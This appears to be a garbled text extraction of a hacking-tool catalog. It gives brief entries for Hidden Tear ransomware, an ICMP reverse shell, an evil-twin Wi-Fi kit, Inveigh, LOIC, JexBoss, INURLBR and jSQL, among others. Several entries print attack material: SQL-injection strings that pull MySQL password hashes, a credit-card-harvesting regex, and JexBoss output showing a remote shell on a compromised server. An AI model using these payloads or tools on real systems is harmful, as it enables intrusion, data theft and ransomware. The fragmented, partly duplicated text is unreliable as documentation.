disabled in your browser.
Usage
Legal Warning
While this may be helpful for some, there are significant risks.
hidden tear may be used only for Educational Purposes. Do not
use it as a ransomware! You could go to jail on obstruction of
justice charges just for running hidden tear, even though you
are innocent.
DownloadHidden-tear
HOOK ANALYSER 3.2 - MALWARE ANALYSIS TOOL
Features/Functionality
Release
Network file (PCAP) analysis - Analyse userprovided .PCAP file and performs analysis on
external IP addresses. Example
Social Intelligence (Pulls data from Twitter- for userdefined keywords and performs network analysis).
Example
Important note - The software shall only be used for "NONCOMMERCIAL" purposes. For commercial usage, written
permission from theAuthormust be obtained prior to use.
RESPONSE HEADERS
hsecscan
A security scanner for HTTP response headers.
Requirements
Python 2.x
Usage
$ ./hsecscan.py
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U UserAgent]
-P, --database
database.
-p, --headers
-R, --redirect
Example
$ ./hsecscan.py -u https://google.com
>> RESPONSE INFO <<
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_VuWHqWX8QeHraH4DQ
Code: 200
Headers:
Date: Sun, 08 Nov 2015 14:12:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See http://
www.google.com/support/accounts/bin/answer.py?
hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie:
PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938
:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015
16:02:17 GMT; path=/; domain=.google.com.br
Set-Cookie:
NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34
-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgztoFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5
pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT;
path=/; domain=.google.com.br; HttpOnly
Alternate-Protocol: 443:quic,p=1
Alt-Svc: quic="www.google.com:443"; p="1";
ma=600,quic=":443"; p="1"; ma=600
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
>> RESPONSE HEADERS DETAILS <<
oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5
pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT;
path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security
pitfalls. In particular, cookies encourage developers to
rely on ambient authority for authentication, often
becoming vulnerable to attacks such as cross-site request
forgery. Also, when storing session identifiers in
cookies, developers often create session fixation
vulnerabilities. Transport-layer encryption, such as that
employed in HTTPS, is insufficient to prevent a network
attacker from obtaining or altering a victim's cookies
because the cookie protocol itself has various
vulnerabilities. In addition, by default, cookies do not
provide confidentiality or integrity from network
attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/
rfc6265#section-8
Recommendations: Please at least read these references:
https://tools.ietf.org/html/rfc6265#section-8 and
https://www.owasp.org/index.php/
Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without
'Secure' Attribute
CWE URL: https://cwe.mitre.org/data/definitions/614.html
Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/
rfc7233#section-2.3
Security Description: Unconstrained multiple range
requests are susceptible to denial-of-service attacks
because the effort required to request many overlapping
ranges of the same data is tiny compared to the time,
memory, and bandwidth consumed by attempting to serve the
requested data in many parts.
Security Reference: https://tools.ietf.org/html/
rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or
reject egregious range requests, such as requests for
more than two overlapping ranges or for many small ranges
in a single set, particularly when the ranges are
requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption
('Resource Exhaustion')
CWE URL: https://cwe.mitre.org/data/definitions/400.html
Header Field Name: Expires
Value: -1
Reference: https://tools.ietf.org/html/
rfc7234#section-5.3
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Vary
Value: Accept-Encoding
Reference: https://tools.ietf.org/html/
rfc7231#section-7.1.4
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Server
Value: gws
Reference: https://tools.ietf.org/html/
rfc7231#section-7.4.2
Security Description: Overly long and detailed Server
field values increase response latency and potentially
reveal internal implementation details that might make it
(slightly) easier for attackers to find and exploit known
security holes.
Security Reference: https://tools.ietf.org/html/
rfc7231#section-7.4.2
Recommendations: An origin server SHOULD NOT generate a
Server field containing needlessly fine-grained detail
and SHOULD limit the addition of subproducts by third
parties.
CWE: CWE-200: Information Exposure
CWE URL: https://cwe.mitre.org/data/definitions/200.html
Header Field Name: Connection
Value: close
Reference: https://tools.ietf.org/html/
rfc7230#section-6.1
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Cache-Control
Value: private, max-age=0
Reference: https://tools.ietf.org/html/
rfc7234#section-5.2
Security Description: Caches expose additional potential
vulnerabilities, since the contents of the cache
represent an attractive target for malicious
exploitation.
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://
www.google.com/support/accounts/bin/answer.py?
hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include
security mechanisms, it is intended to be used in
conjunction with security tools. Users' personal
information should always be protected with reasonable
security safeguards in keeping with the sensitivity of
the information.
Security Reference: http://www.w3.org/TR/P3P11/
#principles_security
Recommendations: CWE: CWE URL: Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Reference: https://tools.ietf.org/html/
rfc7231#section-3.1.1.5
Security Description: In practice, resource owners do not
always properly configure their origin server to provide
the correct Content-Type for a given representation, with
Download Hsecscan
HTTPIE - A CLI, CURL-LIKE TOOL FOR HUMANS
Installation
(If pip installation fails for some reason, you can try
easy_install httpie as a fallback.)
Development version
The latest development version can be installed directly from
GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD
# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/
tarball/master
Usage
Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output
options:
$ http -v example.org
The name of the HTTP method comes right before the URL
argument:
$ http DELETE example.org/todos/7
Download HTTPie
HTTPNETWORKSNIFFER V1.50 - PACKET SNIFFER TOOL
THAT CAPTURES ALL HTTP REQUESTS/RESPONSES
You can easily select one or more HTTP information lines, and
then export them to text/html/xml/csv file or copy them to the
clipboard and then paste them into Excel.
System Requirements
/load_file_pcap
<Filename>
/
load_file_netmo
n <Filename>
DownloadHTTPNetworkSniffer v1.50
HYPERFOX - HTTP AND HTTPS TRAFFIC INTERCEPTOR
DownloadHyperfox
I2P - THE INVISIBLE INTERNET PROJECT
Download I2P
ICMPSH - SIMPLE REVERSE ICMP SHELL
Usage
If you miss doing that, you will receive information from the
slave, but the slave is unlikely to receive commands send from
the master.
Running the slave
The slave comes with a few command line options as outlined
below:
-t host
-o milliseconds
-b num
Downloadicmpsh
INFERNAL-TWIN - THIS IS EVIL TWIN ATTACK
AUTOMATED (WIRELESS HACKING)
How to install
$ sudo apt-get install apache2
$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root
FAQ:
I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The
solution is to create a new user on the database and use that
user for launching the tool. Follow the following steps.
1. Delete dbconnect.conf file from the Infernalwireless folder
Release Notes:
New Features:
Impelemented
WPA2 hacking
WEP Hacking
SSL Strip
Report generation
PDF Report
HTML Report
Network mapping
MiTM
Probe Request
Changes:
Improved compatibility
Report improvement
Bug Fixes:
Coming Soon:
More attacks.
Expected bugs:
Freeze
Download Infernal-Twin
INSTANT PDF PASSWORD PROTECTOR - PASSWORD
PROTECT PDF FILE
standard Encryption methods - RC4/AES (40-bit, 128-bit, 256bit) based upon the desired security level.
In addition to this, it also helps you set advanced restrictions to
prevent Printing, Copying or Modification of target PDF file.
To further secure it, you can also set 'Owner Password' (also
called Permissions Password) to stop anyone from removing
these restrictions.
'PDF Password Protector' includes Installer for quick
installation/un-installation. It works on both 32-bit & 64-bit
platforms starting from Windows XP to Windows 8.
Features
Copying
Printing
Signing
Commenting
Document Assembly
Page Extraction
or
pip install pythonwhois ipwhois ipaddress shodan
Example
$ ./instarecon.py -s <shodan_key> -o ~/Desktop/
github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>
# ____________________ Scanning github.com
____________________ #
# DNS lookups
[*] Domain: github.com
[*] IPs & reverse DNS:
192.30.252.130 - github.com
[*] NS records:
ns4.p16.dynect.net
204.13.251.16 - ns4.p16.dynect.net
ns3.p16.dynect.net
208.78.71.16 - ns3.p16.dynect.net
ns2.p16.dynect.net
204.13.250.16 - ns2.p16.dynect.net
ns1.p16.dynect.net
208.78.70.16 - ns1.p16.dynect.net
[*] MX records:
ALT2.ASPMX.L.GOOGLE.com
173.194.64.27 - oa-in-f27.1e100.net
ASPMX.L.GOOGLE.com
74.125.203.26
ALT3.ASPMX.L.GOOGLE.com
64.233.177.26
ALT4.ASPMX.L.GOOGLE.com
173.194.219.27
ALT1.ASPMX.L.GOOGLE.com
74.125.25.26 - pa-in-f26.1e100.net
# Whois lookups
[*] Whois domain:
Domain Name: github.com
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-01-08T04:00:18-0800
Creation Date: 2007-10-09T11:20:50-0700
Registrar Registration Expiration Date:
2020-10-09T11:20:50-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
asn_registry: arin
net 0:
cidr: 192.30.252.0/22
range: 192.30.252.0 - 192.30.255.255
name: GITHUB-NET4-1
description: GitHub, Inc.
handle: NET-192-30-252-0-1
address: 88 Colin P Kelly Jr Street
city: San Francisco
state: CA
postal_code: 94107
country: US
abuse_emails: abuse@github.com
tech_emails: hostmaster@github.com
created: 2012-11-15 00:00:00
updated: 2013-01-05 00:00:00
# Querying Shodan for open ports
[*] Shodan:
IP: 192.30.252.130
Organization: GitHub
ISP: GitHub
Port: 22
Banner: SSH-2.0-libssh-0.6.0
Key type: ssh-rsa
Key:
AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa
+PXYPCPy6rbTrTtw7PH
kccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJi
zHhbn2mUjvSAHQqZETY
P81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf
+Se8xhHTvKSCZIFImWwoG6mbUoW
f9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B
+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lG
HSZXy28G3skua2SmVi/
w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==
Fingerprint: 16:27:ac:a5:76:28:2d:36:63:1b:
56:4d:eb:df:a6:48
Port: 80
Banner: HTTP/1.1 301 Moved Permanently
Content-length: 0
Location: https://192.30.252.130/
Connection: close
# Querying Google for subdomains and Linkedin pages, this
might take a while
[*] Possible LinkedIn page: https://au.linkedin.com/
company/github
[*] Subdomains:
blueimp.github.com
199.27.75.133
bounty.github.com
199.27.75.133
designmodo.github.com
199.27.75.133
developer.github.com
199.27.75.133
digitaloxford.github.com
199.27.75.133
documentcloud.github.com
199.27.75.133
education.github.com
50.19.229.116 ec2-50-19-229-116.compute-1.amazonaws.com
50.17.253.231 ec2-50-17-253-231.compute-1.amazonaws.com
54.221.249.148 ec2-54-221-249-148.compute-1.amazonaws.com
enterprise.github.com
54.243.192.65 ec2-54-243-192-65.compute-1.amazonaws.com
54.243.49.169 ec2-54-243-49-169.compute-1.amazonaws.com
erkie.github.com
199.27.75.133
eternicode.github.com
199.27.75.133
facebook.github.com
199.27.75.133
fortawesome.github.com
199.27.75.133
gist.github.com
192.30.252.141 - gist.github.com
guides.github.com
199.27.75.133
h5bp.github.com
199.27.75.133
harvesthq.github.com
199.27.75.133
help.github.com
199.27.75.133
hexchat.github.com
199.27.75.133
hubot.github.com
199.27.75.133
ipython.github.com
199.27.75.133
janpaepke.github.com
199.27.75.133
jgilfelt.github.com
199.27.75.133
jobs.github.com
54.163.15.207 ec2-54-163-15-207.compute-1.amazonaws.com
kangax.github.com
199.27.75.133
karlseguin.github.com
199.27.75.133
kouphax.github.com
199.27.75.133
learnboost.github.com
199.27.75.133
liferay.github.com
199.27.75.133
lloyd.github.com
199.27.75.133
mac.github.com
199.27.75.133
mapbox.github.com
199.27.75.133
matplotlib.github.com
199.27.75.133
mbostock.github.com
199.27.75.133
mdo.github.com
199.27.75.133
mindmup.github.com
199.27.75.133
mrdoob.github.com
199.27.75.133
msysgit.github.com
199.27.75.133
nativescript.github.com
199.27.75.133
necolas.github.com
199.27.75.133
nodeca.github.com
199.27.75.133
onedrive.github.com
199.27.75.133
pages.github.com
199.27.75.133
panrafal.github.com
199.27.75.133
parquet.github.com
199.27.75.133
pnts.github.com
199.27.75.133
raw.github.com
199.27.75.133
rg3.github.com
199.27.75.133
rosedu.github.com
199.27.75.133
schacon.github.com
199.27.75.133
scottjehl.github.com
199.27.75.133
shop.github.com
192.30.252.129 - github.com
shopify.github.com
199.27.75.133
status.github.com
184.73.218.119 ec2-184-73-218-119.compute-1.amazonaws.com
107.20.225.214 ec2-107-20-225-214.compute-1.amazonaws.com
thoughtbot.github.com
199.27.75.133
tomchristie.github.com
199.27.75.133
training.github.com
199.27.75.133
try.github.com
199.27.75.133
twbs.github.com
199.27.75.133
twitter.github.com
199.27.75.133
visualstudio.github.com
54.192.134.13 server-54-192-134-13.syd1.r.cloudfront.net
54.230.135.112 server-54-230-135-112.syd1.r.cloudfront.net
54.192.134.21 server-54-192-134-21.syd1.r.cloudfront.net
54.230.134.194 server-54-230-134-194.syd1.r.cloudfront.net
54.192.133.169 server-54-192-133-169.syd1.r.cloudfront.net
54.192.133.193 server-54-192-133-193.syd1.r.cloudfront.net
54.230.134.145 server-54-230-134-145.syd1.r.cloudfront.net
54.240.176.208 server-54-240-176-208.syd1.r.cloudfront.net
wagerfield.github.com
199.27.75.133
webcomponents.github.com
199.27.75.133
webpack.github.com
199.27.75.133
weheart.github.com
199.27.75.133
192.30.252.150 - ssh.github.com
192.30.252.151 - ssh.github.com
192.30.252.152 - pages.github.com
192.30.252.153 - pages.github.com
192.30.252.154 - pages.github.com
192.30.252.155 - pages.github.com
192.30.252.156 - githubusercontent.github.com
192.30.252.157 - githubusercontent.github.com
192.30.252.158 - githubusercontent.github.com
192.30.252.159 - githubusercontent.github.com
192.30.252.192 - github-smtp2-ext1.iad.github.net
192.30.252.193 - github-smtp2-ext2.iad.github.net
192.30.252.194 - github-smtp2-ext3.iad.github.net
192.30.252.195 - github-smtp2-ext4.iad.github.net
192.30.252.196 - github-smtp2-ext5.iad.github.net
192.30.252.197 - github-smtp2-ext6.iad.github.net
192.30.252.198 - github-smtp2-ext7.iad.github.net
192.30.252.199 - github-smtp2-ext8.iad.github.net
192.30.253.1 - ops-puppetmaster1-cp1-prd.iad.github.com
192.30.253.2 - janky-nix101-cp1-prd.iad.github.com
192.30.253.3 - janky-nix102-cp1-prd.iad.github.com
192.30.253.4 - janky-nix103-cp1-prd.iad.github.com
192.30.253.5 - janky-nix104-cp1-prd.iad.github.com
192.30.253.6 - janky-nix105-cp1-prd.iad.github.com
192.30.253.7 - janky-nix106-cp1-prd.iad.github.com
192.30.253.8 - janky-nix107-cp1-prd.iad.github.com
192.30.253.9 - janky-nix108-cp1-prd.iad.github.com
192.30.253.10 - gw.internaltools-esx1-cp1prd.iad.github.com
192.30.253.11 - janky-chromium101-cp1-prd.iad.github.com
192.30.253.12 - gw.internaltools-esx2-cp1prd.iad.github.com
192.30.253.13 - github-mon2ext-cp1-prd.iad.github.net
192.30.253.16 - github-smtp2a-ext-cp1-prd.iad.github.net
192.30.253.17 - github-smtp2b-ext-cp1-prd.iad.github.net
192.30.253.23 - ops-bastion1-cp1-prd.iad.github.com
192.30.253.30 - github-slowsmtp1-ext-cp1prd.iad.github.net
192.30.254.1 - github-lb3a-cp1-prd.iad.github.com
192.30.254.2 - github-lb3b-cp1-prd.iad.github.com
192.30.254.3 - github-lb3c-cp1-prd.iad.github.com
192.30.254.4 - github-lb3d-cp1-prd.iad.github.com
# Saving output csv file
# Done
Download InstaRecon
INTRIGUE - INTELLIGENCE GATHERING FRAMEWORK
Starting up...
Start a task:
$ bundle exec ./core-cli.rb start dns_lookup_forward
DnsRecord#intrigue.io
true
[+] Starting task
[+] Task complete!
[+] Start Results
DnsRecord#www.intrigue.io
IpAddress#192.0.78.13
[ ] End Results
[+] Task Log:
[ ] : Got allowed option: resolver
[ ] : Allowed option:
{:name=>"resolver", :type=>"String", :regex=>"ip_address"
, :default=>"8.8.8.8"}
[ ] : Regex should match an IP Address
[ ] : No need to convert resolver to a string
[+] : Allowed user_option! {"name"=>"resolver",
"value"=>"8.8.8.8"}
[ ] : Got allowed option: brute_list
[ ] : Allowed option:
{:name=>"brute_list", :type=>"String", :regex=>"alpha_num
eric_list", :default=>["mx", "mx1", "mx2", "www", "ww2",
"ns1", "ns2", "ns3", "test", "mail", "owa", "vpn",
"admin", "intranet", "gateway", "secure", "admin",
"service", "tools", "doc", "docs", "network", "help",
"en", "sharepoint", "portal", "public", "private", "pub",
"zeus", "mickey", "time", "web", "it", "my", "photos",
"safe", "download", "dl", "search", "staging"]}
[ ] : Regex should match an alpha-numeric list
[ ] : No need to convert brute_list to a string
[+] : Allowed user_option! {"name"=>"brute_list",
"value"=>"1,2,3,4,www"}
Check the Alexa top 1000 domains for the existence of security
headers:
$ for x in `cat data/domains.txt | head -n 1000`; do
bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#
$x;done
Intrigue.new
a :attributes key
> entity = {
:type => "String",
:attributes => { :name => "intrigue.io"}
}
# Create a list of options (this can be empty)
> options_list = [
{ :name => "resolver", :value => "8.8.8.8" }
]
> x.start "example", entity_hash, options_list
> id
You can use the tried and true curl utility to request a task run.
Specify the task type, specify an entity, and the appropriate
options:
$ curl -s -X POST -H "Content-Type: application/json" -d
'{ "task": "example", "entity": { "type": "String",
"attributes": { "name": "8.8.8.8" } }, "options": {} }'
http://127.0.0.1:7777/v1/task_runs
Download Intrigue-core
INURLBR - ADVANCED SEARCH IN MULTIPLE SEARCH
ENGINES
Help:
-h
--help
--ajuda
--info
Information script.
[1...24] / [e1..6]]:
[options]:
1
- BING
- YAHOO BR
- ASK
- HAO123 BR
- GOOGLE (API)
- LYCOS
- UOL BR
- YAHOO US
10
- SAPO
11
- DMOZ
12
- GIGABLAST
13
- NEVER
14
- BAIDU BR
15
- YANDEX
16
- ZOO
17
- HOTBOT
18
- ZHONGSOU
19
- HKSEARCH
20
- EZILION
21
- SOGOU
22
- DUCK DUCK GO
23
- BOOROW
24
---------------------------------------SPECIAL MOTORS
---------------------------------------e1
- TOR FIND
e2
- ELEPHANT
e3
- TORSEARCH
e4
- WIKILEAKS
e5
- OTN
e6
- EXPLOITS SHODAN
Example: -q {op}
Usage:
-q 1
-q 5
Using more than one engine:
-q
1,2,5,6,11,24
Using all engines:
-q all
--proxy localhost:8118
--proxy socks5://googleinurl@localhost:9050
--proxy http://admin:12334@172.16.0.90:8080
--proxy-file Set font file to randomize your proxy to
each search engine.
Example: --proxy-file {proxys}
Usage:
--proxy-file proxys_list.txt
--time-proxy 10
--proxy-http-file http_proxys.txt
the script:
It establishes connection with the exploit through
the get method.
Demo: www.alvo.com.br/pasta/index.php?id={exploit}
types:
Then, of course, it also establishes connection with
the exploit through the get method
Demo: www.target.com.br{exploit}
Default:
Example: -t {op}
Usage:
4
-t 1
www.target.com.br/brazil.php?new={exploit}
5
[*]ZEND FRAMEWORK,
[*]ERROR MYSQL,
[*]ERROR MICROSOFT,
[*]ERROR POSTGRESQL,
[*]CMS WORDPRESS,
[*]ERROR JDBC,
[*]ERROR ASP,
[*]ERROR ORACLE,
CFM,
[*]SHELL WEB,
[*]ERROR DB2,
[*]JDBC
[*]ERROS LUA,
[*]ERROR INDEFINITE
--dork '[DORK]site:br[DORK]site:ar
inurl:php[DORK]site:il inurl:asp'
--dork-file Set font file with your search dorks.
Example: --dork-file {dork_file}
Usage:
--dork-file 'dorks.txt'
--exploit-get "?'%270x27;"
--exploit-post
'field1=valor1&field2=valor2&field3=?
0x273exploit;&botao=ok'
--exploit-command '/admin/config.conf'
script:
Example: -a {string}
Usage:
-d
-a '<title>hello world</title>'
-s
vulnerable URLs.
Example: -s {file}
Usage:
-o
-s your_file.txt
-o tests.txt
Attempts when Google blocks your search.
--persist 7
Return validation method post REDIRECT_URL
--ifredirect '/admin/painel.php'
-m
-u
specified.
--gc Enable validation of values with google webcache.
--pr
--range '172.16.0.5#172.16.0.255'
--range-rand '50'
--irc 'irc.rizon.net#inurlbrasil'
--sedmail youemail@inurl.com.br
--delay 10
--time-out 10
--ifurl index.php?id=
--ifcode 200
--ifemail sp.gov.br
--url-reference http://target.com/admin/
user/valid.php
--mp Limits the number of pages in the search engines.
Example: --mp {limit}
Usage:
--mp 50
--sall your_file.txt
_TARGET_'
--command-vul './exploit.sh _TARGET_
output.txt'
--command-vul 'php miniexploit.php -t
_TARGET_ -s output.txt'
--command-all Use this commmand to specify a single
command to EVERY URL found.
Example: --command-all {command}
Usage:
_TARGET_'
--command-all './exploit.sh _TARGET_
output.txt'
--command-all 'php miniexploit.php -t
_TARGET_ -s output.txt'
[!] Observation:
_TARGET_ will be replaced by the URL/target found,
although if the user
doesn't input the get, only the domain will be
executed.
_TARGETFULL_ will be replaced by the original URL /
target found.
argument --exploit-command.
The exploit-command will be identified by the
parameters --command-vul/ --command-all as _EXPLOIT_
--replace Replace values in the target URL.
Example:
Usage:
--replace {value_old[INURL]value_new}
--replace 'index.php?id=[INURL]index.php?
id=1666+and+(SELECT+user,Password+from+mysql.user+limit
+0,1)=1'
--replace 'main.php?id=[INURL]main.php?
id=1+and+substring(@@version,1,1)=1'
--replace 'index.aspx?id=[INURL]index.aspx?
id=1%27'
--remove Remove values in the target URL.
Example: --remove {string}
Usage:
--remove '/admin.php?id=0'
--regexp {regular_expression}
--regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5]
[0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|
3[47][0-9]{13})'
IP Addresses:
Usage:
--regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?
[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]
[0-9]?))'
EMAIL:
Usage:
--regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
---regexp-filter {regular_expression}
EMAIL:
Usage:
---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.
\_\-]+)'
--exploit-all-id 1,2,8,22
--exploit-vul-id 1,2,8,22
--sub-file
--sub-file exploits_get.txt
--sub-get
--sub-get
_TARGET_'
--sub-cmd-vul './exploit.sh _TARGET_
output.txt'
--sub-cmd-vul 'php miniexploit.php -t
_TARGET_ -s output.txt'
--sub-cmd-all Run command to each target found within
the sub-process scope.
Example: --sub-cmd-all {command}
Usage:
_TARGET_'
--sub-cmd-all './exploit.sh _TARGET_
output.txt'
--sub-cmd-all 'php miniexploit.php -t
_TARGET_ -s output.txt'
--port-scan '22,21,23,3306'
sqli=1'
--port-write Send values for door.
Example: --port-write {'value0','value1','value3'}
Usage:
md5(102030)
Usage:
--exploit-get 'user?id=md5(102030)'
base64(102030)
Usage:
--exploit-get 'user?id=base64(102030)'
hex(102030)
Usage:
--exploit-get 'user?id=hex(102030)'
random(8)
Usage:
--exploit-get 'user?id=random(8)'
Usage
To get a list of basic options and switches use:
php inurlbr.php -h
DownloadINURLBR
INVEIGH - A WINDOWS POWERSHELL LLMNR/NBNS
dedicated listener.
5. The local LLMNR/NBNS services do not need to be
disabled on the host system.
6. LLMNR/NBNS spoofer will point victims to host system's
SMB service, keep account lockout scenarios in mind.
7. Kerberos should downgrade for SMB authentication due
to spoofed hostnames not being valid in DNS.
8. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open
within any local firewall on the host system.
9. Output files will be created in current working directory.
10. If you copy/paste challenge/response captures from
output window for password cracking, remove carriage
returns.
Usage
DownloadInveigh
IP THIEF - SIMPLE IP STEALER IN PHP
Download IP Thief
IVRE - A PYTHON NETWORK RECON FRAMEWORK,
BASED ON NMAP, BRO & P0F
Passive recon
The following steps will show some examples of passive
network recon with IVRE. If you only want active (for example,
You need to run bro (2.3 minimum) with the option -b and the
location of the passiverecon.bro file. If you want to run it on
the eth0 interface, for example, run:
# mkdir logs
# bro -b /usr/local/share/ivre/passiverecon/
passiverecon.bro -i eth0
This will produce log files in the logs directory. You need to run
a passivereconworker to process these files. You can try:
$ passivereconworker --directory=logs
This program will not stop by itself. You can (p)kill it, it will
stop gently (as soon as it has finished to process the current
file).
Using p0f
Active recon
Scanning
This will run a standard scan against 1000 random hosts on the
Internet by running 30 nmap processes in parallel. See the
output of runscans --help if you want to do something else.
When it's over, to import the results in the database, run:
$ nmap2db -c ROUTABLE-CAMPAIGN-001 -s MySource -r scans/
ROUTABLE/up
DownloadIVRE
JADX - JAVA SOURCE CODE FROM ANDROID DEX AND
APK FILES
Command line and GUI tools for produce Java source code
from Android Dex and Apk files.
Usage
jadx[-gui] [options] <input file> (.dex, .apk, .jar
or .class)
options:
-d, --output-dir
- output directory
dot file
--raw-cfg
- verbose output
-h, --help
Example:
jadx -d out classes.dex
Download JADX
JAVA LOIC - LOW ORBIT ION CANNON. A JAVA BASED
NETWORK STRESS TESTING APPLICATION
DownloadJava LOIC
JEXBOSS - JBOSS VERIFY AND EXPLOITATION TOOL
JexBoss is a tool for testing and exploiting vulnerabilities in
JBoss Application Server.
REQUIREMENTS
INSTALLATION
To install the latest version of JexBoss, please use the
following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py
FEATURES
The tool and exploits were developed and tested for versions 3,
4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4 and 5
USAGE EXAMPLE
--- *
|
| @author:
| @contact: joaomatosf@gmail.com
| @update: https://github.com/joaomatosf/jexboss
#______________________________________________________#
[ OK ]
* Checking jmx-console:
[ VULNERABLE ]
* Checking JMXInvokerServlet:
[ VULNERABLE ]
wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - *
* https://site-teste.com:
Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9
21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.5 (Final)
uid=509(jboss) gid=509(jboss) grupos=509(jboss)
context=system_u:system_r:initrc_t:s0
[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin
[Type commands or "exit" to finish]
Shell> hostname
fwgw
[Type commands or "exit" to finish]
Shell> ls -all /tmp
total 35436
drwxrwxrwt.
4 root root
snortrules-snapshot-2962.tar.gz
-rw-r--r--.
1 root root
32 Out 16 14:51
snortrules-snapshot-2962.tar.gz.md5
-rw-------.
1 root root
-rw-------.
1 root root
yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.
1 root root
1014 Out
6 00:33
yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.
1 root root
543 Out
6 02:14
yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.
1 root root
yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.
1 root root
yum_save_tx-2014-10-15-16-004hKzCF.yumtx
[Type commands or "exit" to finish]
Shell>
Download JexBoss
JOHNNY - GUI FOR JOHN THE RIPPER
Download Johnny
JOOMLAVS - A BLACK BOX, JOOMLA VULNERABILITY
SCANNER
--basic-auth
Enumeration options
-a, --scan-all
extensions
-c, --scan-components
-m, --scan-modules
-t, --scan-templates
-q, --quiet
methods
Advanced options
--follow-redirection
Automatically follow
redirections
--no-colour
--proxy
<[protocol://]host:port> HTTP,
authentication credentials
--threads
Download Joomlavs
JSQL INJECTION V0.73 - JAVA TOOL FOR AUTOMATIC
penetration distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project,
BlackArch Linux and Cyborg Hawk Linux.
CHANGE LOG
Coming... i18n arabic russian chinese integration,
next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and
Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16
db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db
vendors supported: MySQL Oracle SQLServer PostgreSQL
DB2 Firebird Informix Ingres MaxDb Sybase. JUnit
tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...),
Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for
webshell commands, Configuration backup, Update
checker.
